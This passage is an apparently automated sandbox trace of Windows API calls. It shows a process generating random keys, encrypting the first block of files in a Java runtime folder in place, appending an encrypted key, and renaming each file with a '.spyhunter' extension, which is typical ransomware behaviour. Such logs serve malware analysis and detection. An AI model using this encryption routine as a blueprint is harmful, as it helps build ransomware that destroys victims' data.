lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4ac*=0x30, lpOverlapped=0x0) returned 1 [0126.930] CloseHandle (hObject=0xf4) returned 1 [0126.931] GetProcessHeap () returned 0x2c0000 [0126.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0126.931] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.spyhunter") returned 61 [0126.931] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\meta-index.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\meta-index.spyhunter")) returned 1 [0126.936] GetProcessHeap () returned 0x2c0000 [0126.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0126.936] GetProcessHeap () returned 0x2c0000 [0126.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0126.936] GetProcessHeap () returned 0x2c0000 [0126.936] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3de0 | out: hHeap=0x2c0000) returned 1 [0126.936] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4e8 | out: pbBuffer=0x270f4e8) returned 1 [0126.936] GetProcessHeap () returned 0x2c0000 [0126.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0126.936] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4e0*=0x30) returned 1 [0126.936] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0126.937] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties") returned 73 [0126.937] StrStrW (lpFirst="management.properties", lpSrch=".txt") returned 0x0 [0126.937] GetProcessHeap () returned 0x2c0000 [0126.937] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0126.937] ReadFile (in: hFile=0xf4, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270f4a4*=0x2800, lpOverlapped=0x0) returned 1 [0127.026] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.026] WriteFile (in: hFile=0xf4, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270f4a4*=0x2800, lpOverlapped=0x0) returned 1 [0127.026] GetProcessHeap () returned 0x2c0000 [0127.026] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0127.026] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.026] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x270f4e4*, lpNumberOfBytesWritten=0x270f4a4*=0x4, lpOverlapped=0x0) returned 1 [0127.098] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4a4*=0x30, lpOverlapped=0x0) returned 1 [0127.098] CloseHandle (hObject=0xf4) returned 1 [0127.098] GetProcessHeap () returned 0x2c0000 [0127.098] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.098] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.spyhunter") returned 83 [0127.098] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\management\\management.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\management\\management.properties.spyhunter")) returned 1 [0127.099] GetProcessHeap () returned 0x2c0000 [0127.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.099] GetProcessHeap () returned 0x2c0000 [0127.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.099] GetProcessHeap () returned 0x2c0000 [0127.099] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee4e10 | out: hHeap=0x2c0000) returned 1 [0127.099] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4e8 | out: pbBuffer=0x270f4e8) returned 1 [0127.099] GetProcessHeap () returned 0x2c0000 [0127.099] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.099] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4e0*=0x30) returned 1 [0127.099] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.100] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties") returned 61 [0127.100] StrStrW (lpFirst="flavormap.properties", lpSrch=".txt") returned 0x0 [0127.100] GetProcessHeap () returned 0x2c0000 [0127.100] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0127.100] ReadFile (in: hFile=0xf4, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270f4a4*=0xf58, lpOverlapped=0x0) returned 1 [0127.198] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffff0a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.198] WriteFile (in: hFile=0xf4, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0xf58, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270f4a4*=0xf58, lpOverlapped=0x0) returned 1 [0127.199] GetProcessHeap () returned 0x2c0000 [0127.199] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0127.199] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.199] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x270f4e4*, lpNumberOfBytesWritten=0x270f4a4*=0x4, lpOverlapped=0x0) returned 1 [0127.199] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f4a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f4a4*=0x30, lpOverlapped=0x0) returned 1 [0127.199] CloseHandle (hObject=0xf4) returned 1 [0127.199] GetProcessHeap () returned 0x2c0000 [0127.199] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f06528 [0127.199] wnsprintfW (in: pszDest=0x2f06528, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.spyhunter") returned 71 [0127.199] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\flavormap.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\flavormap.properties.spyhunter")) returned 1 [0127.200] GetProcessHeap () returned 0x2c0000 [0127.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f06528 | out: hHeap=0x2c0000) returned 1 [0127.200] GetProcessHeap () returned 0x2c0000 [0127.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.200] GetProcessHeap () returned 0x2c0000 [0127.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbfba0 | out: hHeap=0x2c0000) returned 1 [0127.200] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4e0 | out: pbBuffer=0x270f4e0) returned 1 [0127.200] GetProcessHeap () returned 0x2c0000 [0127.200] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.200] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4d8*=0x30) returned 1 [0127.200] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.202] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina") returned 61 [0127.202] StrStrW (lpFirst="Araguaina", lpSrch=".txt") returned 0x0 [0127.202] GetProcessHeap () returned 0x2c0000 [0127.202] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.202] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f49c*=0x37c, lpOverlapped=0x0) returned 1 [0127.211] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffc84, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.211] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x37c, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f49c*=0x37c, lpOverlapped=0x0) returned 1 [0127.211] GetProcessHeap () returned 0x2c0000 [0127.211] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.211] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.211] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x270f4dc*, lpNumberOfBytesWritten=0x270f49c*=0x4, lpOverlapped=0x0) returned 1 [0127.212] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f49c*=0x30, lpOverlapped=0x0) returned 1 [0127.212] CloseHandle (hObject=0xf4) returned 1 [0127.213] GetProcessHeap () returned 0x2c0000 [0127.213] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.213] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.spyhunter") returned 71 [0127.213] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Araguaina.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\araguaina.spyhunter")) returned 1 [0127.214] GetProcessHeap () returned 0x2c0000 [0127.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.214] GetProcessHeap () returned 0x2c0000 [0127.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.214] GetProcessHeap () returned 0x2c0000 [0127.214] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cbff88 | out: hHeap=0x2c0000) returned 1 [0127.214] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4e0 | out: pbBuffer=0x270f4e0) returned 1 [0127.214] GetProcessHeap () returned 0x2c0000 [0127.214] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.214] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4d8*=0x30) returned 1 [0127.214] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.215] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit") returned 59 [0127.215] StrStrW (lpFirst="Detroit", lpSrch=".txt") returned 0x0 [0127.215] GetProcessHeap () returned 0x2c0000 [0127.215] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.215] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f49c*=0x4b0, lpOverlapped=0x0) returned 1 [0127.225] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb50, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.225] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4b0, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f49c*=0x4b0, lpOverlapped=0x0) returned 1 [0127.225] GetProcessHeap () returned 0x2c0000 [0127.225] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.225] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.225] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x270f4dc*, lpNumberOfBytesWritten=0x270f49c*=0x4, lpOverlapped=0x0) returned 1 [0127.225] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f49c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f49c*=0x30, lpOverlapped=0x0) returned 1 [0127.226] CloseHandle (hObject=0xf4) returned 1 [0127.226] GetProcessHeap () returned 0x2c0000 [0127.226] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.226] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.spyhunter") returned 69 [0127.226] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Detroit.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\detroit.spyhunter")) returned 1 [0127.424] GetProcessHeap () returned 0x2c0000 [0127.424] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.424] GetProcessHeap () returned 0x2c0000 [0127.427] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.430] GetProcessHeap () returned 0x2c0000 [0127.430] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e60d80 | out: hHeap=0x2c0000) returned 1 [0127.430] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4d8 | out: pbBuffer=0x270f4d8) returned 1 [0127.431] GetProcessHeap () returned 0x2c0000 [0127.431] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.431] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4d0*=0x30) returned 1 [0127.431] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.431] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha") returned 59 [0127.431] StrStrW (lpFirst="Noronha", lpSrch=".txt") returned 0x0 [0127.432] GetProcessHeap () returned 0x2c0000 [0127.432] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.432] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f494*=0x179, lpOverlapped=0x0) returned 1 [0127.433] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffe87, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.433] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x179, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f494*=0x179, lpOverlapped=0x0) returned 1 [0127.433] GetProcessHeap () returned 0x2c0000 [0127.433] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.433] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.433] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x270f4d4*, lpNumberOfBytesWritten=0x270f494*=0x4, lpOverlapped=0x0) returned 1 [0127.433] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f494*=0x30, lpOverlapped=0x0) returned 1 [0127.433] CloseHandle (hObject=0xf4) returned 1 [0127.433] GetProcessHeap () returned 0x2c0000 [0127.433] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.434] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.spyhunter") returned 69 [0127.434] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Noronha.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\noronha.spyhunter")) returned 1 [0127.434] GetProcessHeap () returned 0x2c0000 [0127.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.435] GetProcessHeap () returned 0x2c0000 [0127.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.435] GetProcessHeap () returned 0x2c0000 [0127.435] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9400 | out: hHeap=0x2c0000) returned 1 [0127.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4d8 | out: pbBuffer=0x270f4d8) returned 1 [0127.435] GetProcessHeap () returned 0x2c0000 [0127.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4d0*=0x30) returned 1 [0127.435] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf4 [0127.436] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome") returned 56 [0127.436] StrStrW (lpFirst="Nome", lpSrch=".txt") returned 0x0 [0127.436] GetProcessHeap () returned 0x2c0000 [0127.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0127.436] ReadFile (in: hFile=0xf4, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270f494*=0x4cc, lpOverlapped=0x0) returned 1 [0127.456] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0xfffffb34, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0127.456] WriteFile (in: hFile=0xf4, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x4cc, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270f494*=0x4cc, lpOverlapped=0x0) returned 1 [0127.456] GetProcessHeap () returned 0x2c0000 [0127.456] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0127.456] SetFilePointerEx (in: hFile=0xf4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0127.456] WriteFile (in: hFile=0xf4, lpBuffer=0x270f4d4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x270f4d4*, lpNumberOfBytesWritten=0x270f494*=0x4, lpOverlapped=0x0) returned 1 [0127.457] WriteFile (in: hFile=0xf4, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270f494, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x270f494*=0x30, lpOverlapped=0x0) returned 1 [0127.457] CloseHandle (hObject=0xf4) returned 1 [0127.457] GetProcessHeap () returned 0x2c0000 [0127.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ea7ba0 [0127.457] wnsprintfW (in: pszDest=0x2ea7ba0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.spyhunter") returned 66 [0127.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Nome.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\nome.spyhunter")) returned 1 [0127.458] GetProcessHeap () returned 0x2c0000 [0127.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ea7ba0 | out: hHeap=0x2c0000) returned 1 [0127.458] GetProcessHeap () returned 0x2c0000 [0127.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0127.458] GetProcessHeap () returned 0x2c0000 [0127.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eb9340 | out: hHeap=0x2c0000) returned 1 [0127.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270f4d0 | out: pbBuffer=0x270f4d0) returned 1 [0127.458] GetProcessHeap () returned 0x2c0000 [0127.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0127.459] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x270f4c8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x270f4c8*=0x30) returned 1 [0127.459] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\America\\Yakutat" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\america\\yakutat"), 